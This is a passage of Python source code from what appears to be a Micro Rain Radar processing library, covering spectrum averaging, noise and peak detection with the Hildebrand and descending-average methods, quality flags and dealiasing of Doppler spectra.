newNoSpecShape = (rawTimestampsAve.shape[0],)
noSpecAve = np.ma.zeros(newNoSpecShape, dtype=int)
# ugly loop trough new, averaged time vector!
for t, timestamp in enumerate(rawTimestampsAve):
# boolean array containing the wanted entries
booleanTimes = (rawTimestamps < timestamp) * \
(rawTimestamps >= timestamp-averagingTime)
aveLength = np.sum(booleanTimes)
# proceed only if entries were found
if aveLength != 0:
# and if TF and heights are NOT changing and if heights are
# not zero!!
if (
np.all(TFs[booleanTimes] == TFs[booleanTimes][0]) and
np.all(heights[booleanTimes] == heights[booleanTimes][0])
and np.logical_not(np.all(heights[booleanTimes] == 0))
):
# averaging:
rawSpectraAve[t] = np.ma.average(
rawSpectra[booleanTimes], axis=0)
heightsAve[t] = np.ma.average(
heights[booleanTimes], axis=0)
TFsAve[t] = np.ma.average(TFs[booleanTimes], axis=0)
noSpecAve[t] = np.ma.sum(noSpec[booleanTimes])
else:
print("Skipping data due to changed MRR configuration!")
else:
rawSpectraAve[t] = np.nan
heightsAve[t] = np.nan
TFsAve[t] = np.nan
noSpecAve[t] = 0
print("No Data at " + str(unix2date(timestamp)))
self.rawSpectrum = rawSpectraAve
self.time = rawTimestampsAve
self.H = heightsAve
self.TF = TFsAve
self.noSpecPerTimestep = noSpecAve.filled(0)
self.no_t = np.shape(self.time)[0]
self._shape2D = np.shape(self.H)
self._shape3D = np.shape(self.rawSpectrum)
self.co["averagingTime"] = averagingTime
return
def getSub(self, start, stop):
"""
cut out some spectra (for debugging)
start,stop (int): border indices
"""
if stop == -1:
stop = self._shape2D[0]
self.rawSpectrum = self.rawSpectrum[start:stop]
self.time = self.time[start:stop]
self.H = self.H[start:stop]
self.TF = self.TF[start:stop]
self.noSpecPerTimestep = self.noSpecPerTimestep[start:stop]
if len(self.noSpecPerTimestep) == 0:
            raise ValueError('getSub: No data left!')
self.no_t = np.shape(self.time)[0]
self._shape2D = np.shape(self.H)
self._shape3D = np.shape(self.rawSpectrum)
return
def rawToSnow(self):
'''
core function for calculating Ze and other moments. Settings have
to be set before
'''
if self.co["mrrCalibConst"] == 0:
raise IOError('ERROR: MRR calibration constant set to 0!')
self.untouchedRawSpectrum = deepcopy(self.rawSpectrum)
self.specVel = self.co["nyqVel"]
self.specVel3D = np.zeros(self._shape3D)
self.specVel3D[:] = self.specVel
self.specIndex = np.arange(self.no_v)
self._specBorderMask = np.ones(self.co["specShape"], dtype=bool)
for h in range(self.co["noH"]):
self._specBorderMask[h, self.co["spectrumBorderMin"]
[h]:self.co["spectrumBorderMax"][h]] = False
self._specBorderMask3D = np.ones(self._shape3D, dtype=bool)
self._specBorderMask3D[:] = self._specBorderMask
# but we have to apply the TF before we start anything:
TF3D = np.zeros(self._shape3D)
TF3D.T[:] = self.TF.T
self.rawSpectrum = np.ma.masked_array(
self.rawSpectrum.data / TF3D, self.rawSpectrum.mask)
# 1)missing spectra
missingMask = np.any(np.isnan(self.rawSpectrum.data), axis=-1)
self.qual["incompleteSpectrum"] = missingMask
# 2) Wdiff
WdiffMask, self.wdiffs = self._testMeanW(self.rawSpectrum)
# 3) std
stdMask, self.stds = self._testStd(self.rawSpectrum)
# join the results
noiseMask = missingMask+(stdMask*WdiffMask)
self.qual["spectrumVarianceTooLowForPeak"] = stdMask * \
WdiffMask # 2) no signal detected by variance test
# make 3D noise Mask
noiseMaskLarge = np.zeros(self._shape3D, dtype=bool).T
noiseMaskLarge[:] = noiseMask.T
noiseMaskLarge = noiseMaskLarge.T
# we don't need the mask right now since missingMask contains all
# mask entries
self.rawSpectrum = self.rawSpectrum.data
if self.debugStopper == 1:
self.rawSpectrum = np.ma.masked_array(
self.rawSpectrum, noiseMaskLarge)
return
# find the peak
peakMask = np.ones(self._shape3D, dtype=bool)
self.qual["usedSecondPeakAlgorithmDueToWidePeak"] = np.zeros(
self._shape2D, dtype=bool)
self.qual["peakTooThinn"] = np.zeros(self._shape2D, dtype=bool)
for h in range(0, self.co["noH"]):
# check whether there is anything to do
if np.any(np.logical_not(noiseMaskLarge[:, h])):
# get the peak
specMins = self.co["spectrumBorderMin"][h]
specMaxs = self.co["spectrumBorderMax"][h]
res = self._getPeak(
self.rawSpectrum[:, h, specMins:specMaxs][
~noiseMask[:, h]],
self.noSpecPerTimestep[~noiseMask[:, h]],
h
)
(
peakMask[:, h, specMins:specMaxs][~noiseMask[:, h]],
self.qual["peakTooThinn"][:, h][~noiseMask[:, h]],
self.qual["usedSecondPeakAlgorithmDueToWidePeak"][:, h][
~noiseMask[:, h]]
) = res
# apply results
self.rawSpectrum = np.ma.masked_array(self.rawSpectrum, peakMask)
# what is the noise, but _without_ the borders, we want in noise 3D
# also
noise = np.ma.masked_array(self.rawSpectrum.data, (np.logical_not(
self.rawSpectrum.mask)+self._specBorderMask3D))
self.specNoise = np.ma.average(noise, axis=-1).filled(0)
if self.debugStopper == 2:
return
if self.co["confirmPeak_5x5boxCoherenceTest"]:
coherCheckNoiseMask = self._cleanUpNoiseMask(self.rawSpectrum)
coherCheckNoiseMask3D = np.zeros(self._shape3D, dtype=bool)
coherCheckNoiseMask3D.T[:] = coherCheckNoiseMask.T
else:
coherCheckNoiseMask = np.zeros(self._shape2D, dtype=bool)
coherCheckNoiseMask3D = np.zeros(self._shape3D, dtype=bool)
self.qual["peakRemovedByCoherenceTest"] = coherCheckNoiseMask * \
(~np.all(self.rawSpectrum.mask, axis=-1))
self.rawSpectrum.mask = self.rawSpectrum.mask + coherCheckNoiseMask3D
if self.debugStopper == 3:
return
# since we have removed more noisy spectra we have to calculate the
# noise again
noise = np.ma.masked_array(self.rawSpectrum.data, (np.logical_not(
self.rawSpectrum.mask)+self._specBorderMask3D))
self.specNoise = np.ma.average(noise, axis=-1).filled(0)
self.specNoise_std = np.ma.std(noise, axis=-1).filled(0)
self.specNoise3D = np.zeros_like(noise).filled(0)
self.specNoise3D.T[:] = self.specNoise.T
# remove the noise
self.rawSpectrum = np.ma.masked_array(
self.rawSpectrum.data - self.specNoise3D, self.rawSpectrum.mask)
if self.co["interpolateSpectrum"]:
# interpolate spectrum
intSpectrum = deepcopy(self.rawSpectrum.data)
ix = np.arange(len(self.rawSpectrum.ravel()))
intSpectrum[self._specBorderMask3D] = np.interp(
ix[self._specBorderMask3D.ravel()],
ix[~self._specBorderMask3D.ravel()],
self.rawSpectrum[~self._specBorderMask3D]
)
self.rawSpectrum = np.ma.masked_array(
intSpectrum, self.rawSpectrum.mask)
self.qual["interpolatedSpectrum"] = np.ones(
self._shape2D, dtype=bool)
if self.debugStopper == 5:
return
else:
self.qual["interpolatedSpectrum"] = np.zeros(
self._shape2D, dtype=bool)
if self.co["fillInterpolatedPeakGaps"]:
(
self.rawSpectrum.mask,
self.qual["filledInterpolatedPeakGaps"]
) = self._fillInterpolatedPeakGaps(self.rawSpectrum.mask)
else:
self.qual["filledInterpolatedPeakGaps"] = np.zeros(
self._shape2D, dtype=bool)
# calculate the (not dealiased) SNR
self.SNR = (10*np.ma.log10(np.ma.sum(self.rawSpectrum, axis=-1) /
(self.specNoise*self.co["widthSpectrum"]))).filled(-9999)
if self.co["dealiaseSpectrum"] == True:
if self.co["dealiaseSpectrum_saveAlsoNonDealiased"] == True:
                (self.eta_noDA, self.Ze_noDA, self.W_noDA,
                 self.etaNoiseAve_noDA_TBD, self.etaNoiseStd_noDA_TBD,
                 self.specWidth_noDA, self.skewness_noDA, self.kurtosis_noDA,
                 self.peakVelLeftBorder_noDA, self.peakVelRightBorder_noDA,
                 self.leftSlope_noDA,
                 self.rightSlope_noDA) = self._calcEtaZeW(
                     self.rawSpectrum, self.H, self.specVel3D,
                     self.specNoise, self.specNoise_std)
self.qual_noDA = deepcopy(self.qual)
# can be deleted, is identical to self.etaNoise, because noise is not dealiased.
del self.etaNoiseAve_noDA_TBD, self.etaNoiseStd_noDA_TBD
self.rawSpectrum = self._dealiaseSpectrum(self.rawSpectrum)
            # since we do not want spectra from the disturbed 1st range gate
            # to be folded into the second one, peaks in the second one might
            # be incomplete. Make an entry in the quality mask.
self.qual["peakMightBeIncomplete"] = np.zeros(
self._shape2D, dtype=bool)
self.qual["peakMightBeIncomplete"][:, self.co["firstUsedHeight"]][self.rawSpectrum.mask[:, self.co["firstUsedHeight"],
self.co["widthSpectrum"]+self.co["spectrumBorderMin"][self.co["firstUsedHeight"]]] == False] = True
# no dealiasing
else:
pass
        (self.eta, self.Ze, self.W, self.etaNoiseAve, self.etaNoiseStd,
         self.specWidth, self.skewness, self.kurtosis,
         self.peakVelLeftBorder, self.peakVelRightBorder,
         self.leftSlope, self.rightSlope) = self._calcEtaZeW(
            self.rawSpectrum, self.H, self.specVel3D, self.specNoise,
            self.specNoise_std)
# make bin mask out of quality information
self.qualityBin, self.qualityDesc = self.getQualityBinArray(self.qual)
return
def _testMeanW(self, rawSpectrum):
'''
        checks whether the spectrum's mean Doppler velocity differs from the centre of the Nyquist range (about 6 m s^-1)
'''
mask = deepcopy(rawSpectrum.mask) + self._specBorderMask3D
spec = np.ma.masked_array(rawSpectrum.data, mask)
velocity = np.ma.masked_array(self.specVel3D, self._specBorderMask3D)
Wdiff = np.absolute(np.ma.average(
velocity, axis=-1)-(np.ma.sum(velocity*spec, axis=-1)/np.sum(spec, axis=-1)))
noiseMask = Wdiff.filled(0) < self.co["findPeak_minWdiff"]
return noiseMask, Wdiff.filled(0)
def _testStd(self, rawSpectrum):
'''
checks whether spectrum passes variance limit
'''
mask = deepcopy(rawSpectrum.mask) + self._specBorderMask3D
spec = np.ma.masked_array(rawSpectrum.data, mask)
std = (np.ma.std(spec, axis=-1)/np.ma.mean(spec, axis=-1))
# the 5.7 is because we have typically 5.7 spectra per second and this
# quantitiy was defined with self.co["averagingTime"] instead of
# self.noSpecPerTimestep before
maxStd = self.co["findPeak_minStdPerS"] / \
np.sqrt(self.noSpecPerTimestep/5.7)
return std.filled(0) < maxStd[:, np.newaxis], std.filled(0)
def _findAddtionalPeaks(self, rawSpectrum):
'''
        This function tries to find additional peaks in the spectrum.
        Disabled since it gives too many false positives...
'''
qual = np.zeros(self._shape2D, dtype=bool)
# invert mask
rawSpectrum = np.ma.masked_array(rawSpectrum.data, ~rawSpectrum.mask)
self.co["findAddtionalPeaksThreshold"] = 15
for tt in range(self.no_t):
for hh in range(self.no_h):
if hh in self.co["completelyMaskedHeights"]:
continue
greaterZero = 0
for ii in range(self.co["spectrumBorderMin"][hh], self.co["spectrumBorderMax"][hh]):
if greaterZero >= self.co["findAddtionalPeaksThreshold"]:
qual[tt, hh] = True
if rawSpectrum.mask[tt, hh, ii] == True or rawSpectrum.data[tt, hh, ii] <= 0:
greaterZero = 0
continue
else:
greaterZero += 1
return qual
def _cleanUpNoiseMask(self, spectrum):
"""
11 of 5x5 points in height/time space must have a signal to be valid!
        @parameter spectrum (numpy masked float): spectrum + noiseMask to be applied to the data
@return - newMask (numpy boolean):numpy boolean noiseMask
"""
noiseMask = np.all(spectrum.mask, axis=-1)
newMask = deepcopy(noiseMask)
# make it bigger to cover edges for 5x5 test, 2 pixel border
maxs = np.ma.masked_all((self.no_t+4, self.no_h+1))
maxs[2:-2, 2:-2] = np.ma.masked_array(
np.ma.argmax(spectrum, axis=-1), noiseMask)[:, 2:30]
highLimit = 11
lowLimit = 9
lowestLimit = 8
hOffset = self.co["minH"] # since we don't start at zero height
# loop through all points...
for t in np.arange(self.no_t):
            # is it a real signal? only if at least 11 of 25 neighbours have signal as well!
# for h in np.arange(4,28):
for h in np.arange(2, 30):
if noiseMask[t, h] == False:
                    tSM = t+2  # for subMaxs, t needs to be 2 larger due to the 2 pixel border! not necessary for h, the 2 pixel border at the bottom is already there
subMaxs = maxs[tSM-2:tSM+3, h-2:h+3]
thisMaxsDiff = 32-maxs[tSM, h]
subMaxsNormed = limitMaInidces(subMaxs + thisMaxsDiff, 64)
diffs = np.abs(subMaxsNormed - 32)
if t in [0, self.no_t-1] or h in [2, 29]:
limit = lowestLimit
elif t in [1, self.no_t-2] or h in [3, 28]:
limit = lowLimit
else:
limit = highLimit
if np.ma.sum(diffs <= self.co["confirmPeak_5x5boxCoherenceTest_maxBinDistane"]) < limit:
newMask[t, h] = True
# kick out heights #0,1,30
newMask[:, self.co["completelyMaskedHeights"]] = True
self.qual["spectrumNotProcessed"] = np.zeros(self._shape2D, dtype=bool)
self.qual["spectrumNotProcessed"][:,
self.co["completelyMaskedHeights"]] = True
return newMask
def _getPeak(self, spectrum, noSpecs, h):
"""
        get the peak of the spectrum. First getPeakHildebrand is used; if the peak is very wide (wider than getPeak_makeDoubleCheck_minPeakWidth times the spectrum width) and makeDoubleCheck = True, getPeakDescendingAve is used as well and the smaller peak is taken!
@parameter spectrum (numpy float64): (averaged, dealiased) raw data from MRR Raw data
@parameter noSpecs (numpy float64):number of single spectras which belong to each average spectrum, usually 58* No of averaged spectra
@paramter h, (int): height, for easier debugging
@return - spectrum (numpy float64): masked(!) spectrum
@return - qualiy (dict with array bool)
"""
t = time.time()
quality = dict()
specLength = np.shape(spectrum)[-1]
# get maxima of reduced spectra
iMax = np.argmax(spectrum, axis=-1)
iMaxFlat = np.ravel(iMax)
# arrays don't work, so make them flat
spectrumFlat = np.reshape(spectrum, (-1, specLength))
if self.co["getPeak_method"] == "hilde":
# get peak using Hildebrands method
firstPeakMask = self._getPeakHildebrand(
spectrumFlat, iMaxFlat, noSpecs, h)
elif self.co["getPeak_method"] == "descAve":
            # get peak using the descending average method
firstPeakMask = self._getPeakDescendingAve(spectrumFlat, iMaxFlat)
else:
raise ValueError("Unknown doubleCheckPreference: " +
self.co["getPeak_method"])
peakMask = deepcopy(firstPeakMask)
# look for wide peak and make a second check
if self.co["getPeak_makeDoubleCheck"]:
doubleCheck = np.sum(np.logical_not(
firstPeakMask), axis=-1) > specLength * self.co["getPeak_makeDoubleCheck_minPeakWidth"]
quality["veryWidePeakeUsedSecondPeakAlgorithm"] = doubleCheck
if np.any(doubleCheck == True):
#secondPeakMVeryWidePeakeUask = getPeakDescendingAve(spectrumFlat,iMaxFlat)
secondPeakMask = np.zeros(np.shape(spectrumFlat), dtype=bool)
if self.co["getPeak_method"] == "hilde":
# get peak using desc Average method
secondPeakMask[doubleCheck] = self._getPeakDescendingAve(
spectrumFlat[doubleCheck], iMaxFlat[doubleCheck])
elif self.co["getPeak_method"] == "descAve":
# get peak using Hildebrands method
secondPeakMask[doubleCheck] = self._getPeakHildebrand(
spectrumFlat[doubleCheck], iMaxFlat[doubleCheck], noSpecs[doubleCheck], h)
peakMask[doubleCheck] = firstPeakMask[doubleCheck] + \
secondPeakMask[doubleCheck]
else:
quality["veryWidePeakeUsedSecondPeakAlgorithm"] = np.zeros(
specLength, dtype=bool)
# only peaks which are at least 3 bins wide, remove the others
        tooThinn = np.sum(np.logical_not(peakMask),
                          axis=-1) < self.co["findPeak_minPeakWidth"]
peakMask[tooThinn] = True
quality["peakTooThinn"] = tooThinn * (np.sum(~peakMask, axis=-1) != 0)
if self.co["debug"] > 0:
print("runtime", time.time()-t, "s")
# spectrum
return np.reshape(peakMask, np.shape(spectrum)), quality["peakTooThinn"], quality["veryWidePeakeUsedSecondPeakAlgorithm"]
# get the border indices belonging to the hildebrand limit
def _getPeakHildebrand(self, dataFlat, iMax, noSpecs, h):
"""
get the peak of the spectrum using Hildebrand algorithm. Note that this routine works
'the other way around' than e.g. pamtra's or pyart's Hildebrand routine. I.e. we start
with the full spectrum and remove the largest bins instead of starting with the
smallest values and adding larger ones. This is more robust for the MRR. also
getPeak_hildeExtraLimit works better for MRR than teh traditional threshold definition from HS74.
@parameter dataFlat (numpy float64): flat spectrum from MRR Raw data
@parameter iMax (numpy float64): vector containing indices of the maxima
@parameter Nspec (numpy float64): number of spectra of each averaged spectrum
@return - iPeakMin, iMax (int float64): edges of each spectrum
"""
# first get the limit reflectivity
limits = self._noiseHildebrand(dataFlat, noSpecs, h)
maskHildebrand = np.ones(np.shape(dataFlat), dtype=bool)
        # not only uses the extra limit, but also starts at the peak! thus the spectrum is refolded around the peak!
        # then get the edges of the peak as index of the spectrum
for k in np.arange(iMax.shape[0]):
# unmask the peak
maskHildebrand[k, iMax[k]] = False
spectrum = np.roll(dataFlat[k], -iMax[k])
mask = np.roll(maskHildebrand[k], -iMax[k])
# to the right
for i in np.arange(1, dataFlat.shape[-1], 1):
# unmask if above limit (=peak)
if spectrum[i] > limits[k]*self.co["getPeak_hildeExtraLimit"]:
mask[i] = False
# else stop
else:
# unmask on last bin if between limits[k]*self.co["getPeak_hildeExtraLimit"] and limits[k], but stop in any case!
if spectrum[i] > limits[k]:
mask[i] = False
break
# to the left
for i in np.arange(dataFlat.shape[-1]-1, 0-1, -1):
if spectrum[i] > limits[k]*self.co["getPeak_hildeExtraLimit"]:
mask[i] = False
else:
if spectrum[i] > limits[k]:
mask[i] = False
break
dataFlat[k] = np.roll(spectrum, iMax[k])
maskHildebrand[k] = np.roll(mask, iMax[k])
return maskHildebrand
def _noiseHildebrand(self, dataFlat, noSpecs, h, flat=True):
"""
#calculate the minimum reflectivity of the peak (or maximum of the noise) according to Hildebrand and Sekhon
@parameter dataFlat (numpy masked array float64): flat spectrum from MRR Raw data
@parameter Nspec (numpy float64): number of spectra of each averaged spectrum
@return - limits (int float64): limit reflectivity of each spectrum
"""
specLength = np.shape(dataFlat)[-1]
if flat == False:
dataShape = np.shape(dataFlat)[0]
dataFlat = np.reshape(dataFlat, (-1, specLength))
# sort the data
dataFlat = np.ma.sort(dataFlat, axis=-1)
# calculate all variances and means (that is cheaper than a loop!)
        # start with the whole spectrum, then discard the maximum, then the second largest value, etc.
Dvar = np.zeros(dataFlat.shape)
Dmean = np.zeros(dataFlat.shape)
limits = np.zeros(np.shape(dataFlat[..., 0]))
for i in np.arange(specLength-1, 1, -1):
Dvar[..., i] = np.ma.var(dataFlat[..., 0:i], axis=-1)
Dmean[..., i] = np.ma.mean(dataFlat[..., 0:i], axis=-1)
# calculate the Hildebrand coefficient
Dvar[Dvar == 0] = 0.0001
Coefficient = ((Dmean**2) / Dvar)
# check where hildebrands assumption is true
for j in np.arange(np.shape(dataFlat)[0]):
for i in np.arange(specLength-1, -1, -1):
if Coefficient[j, i] >= noSpecs[j]:
limits[j] = dataFlat[j, i-1]
break
if flat == False:
limits = np.reshape(limits, (dataShape, self.co["noH"]))
return limits
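    # A standalone, commented sketch of the Hildebrand & Sekhon (1974) criterion used
    # above: sort the bins and drop the largest ones until mean^2/variance of the
    # remainder reaches the number of averaged spectra; the last dropped level is the
    # noise limit. The toy noise-only spectrum satisfies the criterion immediately.
    #
    #   import numpy as np
    #   spec = np.sort(1.0 + 0.1 * np.random.rand(64))  # toy noise-only spectrum
    #   noSpecs = 58.0                                   # hypothetical no. of averaged spectra
    #   for i in range(len(spec) - 1, 1, -1):
    #       sub = spec[:i]
    #       if sub.mean()**2 / sub.var() >= noSpecs:
    #           limit = spec[i - 1]                      # noise limit reflectivity
    #           break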
def _getPeakDescendingAve(self, dataFlat, iMax):
"""
get the peak of the spectrum
function iterates through the _not_ size-sorted spectrum from the maximum to the left and to the right and stops as soon as the average stops decreasing.
@parameter dataFlat (numpy float64): flat spectrum from MRR Raw data
@parameter iMax (numpy float64): vector containing indices of the maxima
@return - iPeakMin, iMax (int float64): edges of each spectrum
"""
maskDescAve = np.ones(np.shape(dataFlat), dtype=bool)
        # iterate through spectra:
for k in np.arange(iMax.shape[0]):
            # the rolling allows recognition even if 0 m s^-1 is crossed
rolledSpectrum = np.roll(dataFlat[k], -iMax[k])
rolledMask = np.roll(maskDescAve[k], -iMax[k])
meanRightOld = np.ma.mean(
rolledSpectrum[1:self.co["getPeak_descAveCheckWidth"]+1])
meanLeftOld = np.ma.mean(
rolledSpectrum[-1:-(self.co["getPeak_descAveCheckWidth"]+1):-1])
minMeanToBreak = self.co["getPeak_descAveMinMeanWeight"] * np.mean(
np.sort(dataFlat[k])[0:self.co["getPeak_descAveCheckWidth"]])
# unmask peak
rolledMask[0] = False
# to the right:
for i in np.arange(1, dataFlat.shape[-1], 1):
meanRight = np.ma.mean(
rolledSpectrum[i:i+self.co["getPeak_descAveCheckWidth"]])
                # is the average still decreasing?
if meanRight <= meanRightOld or meanRight > minMeanToBreak:
rolledMask[i] = False
meanRightOld = meanRight
else:
break
# to the left
for i in np.arange(dataFlat.shape[-1]-1, 0-1, -1):
meanLeft = np.ma.mean(
rolledSpectrum[i:i-self.co["getPeak_descAveCheckWidth"]:-1])
                # is the average still decreasing?
if meanLeft <= meanLeftOld or meanLeft > minMeanToBreak:
rolledMask[i] = False
meanLeftOld = meanLeft
else:
break
dataFlat[k] = np.roll(rolledSpectrum, iMax[k])
maskDescAve[k] = np.roll(rolledMask, iMax[k])
return maskDescAve
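    # Commented sketch of the descending-average rule used above: walk away from the
    # maximum and keep unmasking bins while the running mean over a small window still
    # decreases; stop once it rises again. Window width and data are hypothetical.
    #
    #   import numpy as np
    #   spec = np.array([1., 2., 8., 3., 2., 1., 4., 5.])  # toy spectrum, peak at index 2
    #   w = 2                                              # hypothetical check width
    #   meanOld = spec[3:3+w].mean()
    #   for i in range(3, len(spec)):
    #       m = spec[i:i+w].mean()
    #       if m <= meanOld:
    #           meanOld = m   # still descending -> bin belongs to the peak
    #       else:
    #           break         # average rose again -> right border found at i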
def _fillInterpolatedPeakGaps(self, specMask):
'''
Interpolate gaps of specMask around 0 m s^-1 between spectrumBorderMin and spectrumBorderMax in noH heights
returns updated specMask and quality information
'''
quality = np.zeros(self._shape2D, dtype=bool)
for h in range(1, self.co["noH"]):
# the ones with peaks at both sides around 0 m s^-1!
peaksAroundZero = (specMask[:, h-1, self.co["spectrumBorderMax"][h-1]-1] == False) * (
specMask[:, h, self.co["spectrumBorderMin"][h]] == False)
specMask[:, h, 0:self.co["spectrumBorderMin"]
[h]][peaksAroundZero] = False
specMask[:, h-1, self.co["spectrumBorderMax"]
[h-1]:][peaksAroundZero] = False
# the ones with peak at only one side,
peaksAroundZeroHalfToLeft = (specMask[:, h-1, self.co["spectrumBorderMax"][h-1]-1] == True) * (
specMask[:, h, self.co["spectrumBorderMin"][h]] == False)
peaksAroundZeroHalfToLeftBMin = (peaksAroundZeroHalfToLeft * (
self.rawSpectrum.data[:, h, 0:self.co["spectrumBorderMin"][h]] > self.specNoise3D[:, h, 0:self.co["spectrumBorderMin"][h]]).T).T
peaksAroundZeroHalfToLeftBMax = (peaksAroundZeroHalfToLeft * (
self.rawSpectrum.data[:, h-1, self.co["spectrumBorderMax"][h-1]:] > self.specNoise3D[:, h, self.co["spectrumBorderMax"][h-1]:]).T).T
specMask[:, h, 0:self.co["spectrumBorderMin"]
[h]][peaksAroundZeroHalfToLeftBMin] = False
specMask[:, h-1, self.co["spectrumBorderMax"]
[h-1]:][peaksAroundZeroHalfToLeftBMax] = False
peaksAroundZeroHalfToRight = (specMask[:, h-1, self.co["spectrumBorderMax"][h-1]-1] == False) * (
specMask[:, h, self.co["spectrumBorderMin"][h]] == True)
peaksAroundZeroHalfToRightBMin = (peaksAroundZeroHalfToRight * (
self.rawSpectrum.data[:, h, 0:self.co["spectrumBorderMin"][h]] > self.specNoise3D[:, h-1, 0:self.co["spectrumBorderMin"][h]]).T).T
peaksAroundZeroHalfToRightBMax = (peaksAroundZeroHalfToRight * (
self.rawSpectrum.data[:, h-1, self.co["spectrumBorderMax"][h-1]:] > self.specNoise3D[:, h-1, self.co["spectrumBorderMax"][h-1]:]).T).T
specMask[:, h, 0:self.co["spectrumBorderMin"]
[h]][peaksAroundZeroHalfToRightBMin] = False
specMask[:, h-1, self.co["spectrumBorderMax"][h-1] :][peaksAroundZeroHalfToRightBMax] = False
quality[:, h] = quality[:, h-1] = peaksAroundZero + \
peaksAroundZeroHalfToLeft + peaksAroundZeroHalfToRight
return specMask, quality
def _dealiaseSpectrum(self, rawSpectrum):
        '''
        dealiase spectrum
        input: rawSpectrum
        output: extended spectrum with 192 bins
        '''
self.qual["severeProblemsDuringDA"] = np.zeros(
self._shape2D, dtype=bool)
        # first locate peaks in the raveled spectrum
self._allPeaks, self._allPeaksIndices, self._allPeaksMaxIndices, self._allPeaksVelMe, self._allPeaksHeight, self._allPeaksRefV, self._allPeaksZe = self._locatePeaks(
rawSpectrum)
        # find one peak and its velocity/height you trust
self._trustedPeakNo, self._trustedPeakHeight, self._trustedPeakVel, self._trustedPeakHeightStart, self._trustedPeakHeightStop = self._getTrustedPeak(
self._allPeaksZe, self._allPeaksVelMe, self._allPeaksRefV, self._allPeaksMaxIndices, self._allPeaksHeight)
# now extend spectrum!
extendedRawSpectrum = deepcopy(rawSpectrum.data)
extendedRawSpectrum = np.concatenate((np.roll(
extendedRawSpectrum, 1, axis=1), extendedRawSpectrum, np.roll(extendedRawSpectrum, -1, axis=1)), axis=2)
        # do not apply to the first range gate
extendedRawSpectrum[:, 0, :self.co["widthSpectrum"]] = 0
# and not to the last one
        extendedRawSpectrum[:, self.co["noH"]-1, 2*self.co["widthSpectrum"]:] = 0
extendedRawSpectrum = np.ma.masked_array(extendedRawSpectrum, True)
# if wanted, save old values
if self.co["dealiaseSpectrum_saveAlsoNonDealiased"] == True:
self.specVel_noDA = deepcopy(self.specVel)
self.specVel3D_noDA = deepcopy(self.specVel3D)
self.specIndex_noDA = deepcopy(self.specIndex)
self.no_v_noDA = deepcopy(self.no_v)
# save new velocities
self.specVel = np.array(list(self.co["nyqVel"] - self.co["widthSpectrum"]*self.co["nyqVdelta"])+list(
self.co["nyqVel"])+list(self.co["nyqVel"] + self.co["widthSpectrum"]*self.co["nyqVdelta"]))
self.specVel3D = np.zeros(np.shape(extendedRawSpectrum))
self.specVel3D[:] = self.specVel
self.specIndex = np.arange(3*self.no_v)
self.no_v = self.no_v * 3
# extend spectrum to 192 bins and unmask best fitting peaks
extendedRawSpectrum = self._findHeightsForPeaks(extendedRawSpectrum, self._trustedPeakNo, self._trustedPeakVel, self._trustedPeakHeight,
self._trustedPeakHeightStart, self._trustedPeakHeightStop, self._allPeaks, self._allPeaksIndices, self._allPeaksVelMe, self._allPeaksHeight)
if self.co["dealiaseSpectrum_makeCoherenceTest"]:
# simple method to detect falsely folded peaks, works only for 1-2 outliers
extendedRawSpectrum = self._deAlCoherence(extendedRawSpectrum)
self.qual["spectrumIsDealiased"] = np.all(
extendedRawSpectrum.mask[:, :, self.co["widthSpectrum"]:2*self.co["widthSpectrum"]] != rawSpectrum.mask[:, :], axis=-1)
# still we don't want peaks at height 0,1,31
extendedRawSpectrum.mask[:, self.co["completelyMaskedHeights"]] = True
return extendedRawSpectrum
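    # Commented illustration of the spectrum triplication performed above: each height's
    # 64-bin spectrum is flanked by the spectra of the neighbouring range gates, so a
    # peak folded across the Nyquist range can be unmasked between -12 and +24 m s^-1.
    #
    #   import numpy as np
    #   spec = np.random.rand(10, 31, 64)   # toy (time, height, velocity) raw spectra
    #   extended = np.concatenate((np.roll(spec, 1, axis=1),
    #                              spec,
    #                              np.roll(spec, -1, axis=1)), axis=2)
    #   assert extended.shape == (10, 31, 192)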
def _locatePeaks(self, rawSpectrum):
        '''
        ravel rawSpectrum and try to find one peak per height
        returns time dictionaries with:
        allPeaks - time dictionary with lists of the spectral reflectivities for each peak
        allPeaksIndices - related indices
        allPeaksMaxIndices - time dictionary with the maximum of each peak
        allPeaksVelMe - first guess peak velocity based on the last bin
        allPeaksHeight - first guess peak height based on the last bin
        allPeaksRefV - expected velocity of each peak based on Ze according to theory
        allPeaksZe - time dictionary with lists of first guess Ze for each peak
        '''
allPeaks = dict()
allPeaksIndices = dict()
allPeaksMaxIndices = dict()
allPeaksVelMe = dict()
allPeaksHeight = dict()
allPeaksRefV = dict()
allPeaksZe = dict()
        # get velocities of spectrum. we start negative, because the first guess height is always the default height of the rightmost bin of the peak
velMe = np.array(list(
self.co["nyqVel"] - self.co["widthSpectrum"]*self.co["nyqVdelta"])+list(self.co["nyqVel"]))
for t in np.arange(self.no_t):
completeSpectrum = self.rawSpectrum[t].ravel()
# skip if there are no peaks in the timestep
            if np.all(completeSpectrum.mask) == True:
                if self.co["debug"] > 4:
                    print('_locatePeaks: nothing to do at', t)
                continue
deltaH = self.H[t, 15] - self.H[t, 14]
peaks = list()
peaksIndices = list()
peaksMaxIndices = list()
peaksVelMe = list()
peaksHeight = list()
peaksVref = list()
peaksZe = list()
peakTmp = list()
peakTmpInd = list()
peaksStartIndices = list()
peaksEndIndices = list()
truncatingPeak = False
# go through all bins
for ii, spec in enumerate(completeSpectrum):
# found peak!
withinPeak = (completeSpectrum.mask[ii] == False) and (
truncatingPeak == False)
if withinPeak:
peakTmp.append(spec)
peakTmpInd.append(ii)
# if the peak length is now larger than the raw spectrum width, then this peak has
# wrapped around the entire width. Flag will cause the peak to be split in two, because
# the next step within the loop through completeSpectrum will have withinPeak False.
if len(peakTmp) >= self.co["widthSpectrum"]:
truncatingPeak = True
                        warnings.warn('Truncated peak early. Masked area has wrapped around spectrum width at ' +
                                      'timestep ' + str(t) + ', bin number ' + str(ii))
                # found no peak, but the last one has to be processed
elif len(peakTmp) >= self.co["findPeak_minPeakWidth"]:
# get the height of the LAST entry of the peak, uses int division // !
peakTmpHeight = peakTmpInd[-1]//self.co["widthSpectrum"]
# reconstruct the non folded indices shifted by 64! since peakTmpInd[-1] is reference
orgIndex = np.arange(peakTmpInd[-1] % self.co["widthSpectrum"]-len(
peakTmpInd), peakTmpInd[-1] % self.co["widthSpectrum"])+1+self.co["widthSpectrum"]
# calculate a first guess Ze
etaSumTmp = np.sum(
peakTmp * np.array((self.co["mrrCalibConst"] * (peakTmpHeight**2 * deltaH)) / (1e20), dtype=float))
                    # in rare cases, Ze is below zero, maybe because the wrong peak is examined?
if etaSumTmp <= 0:
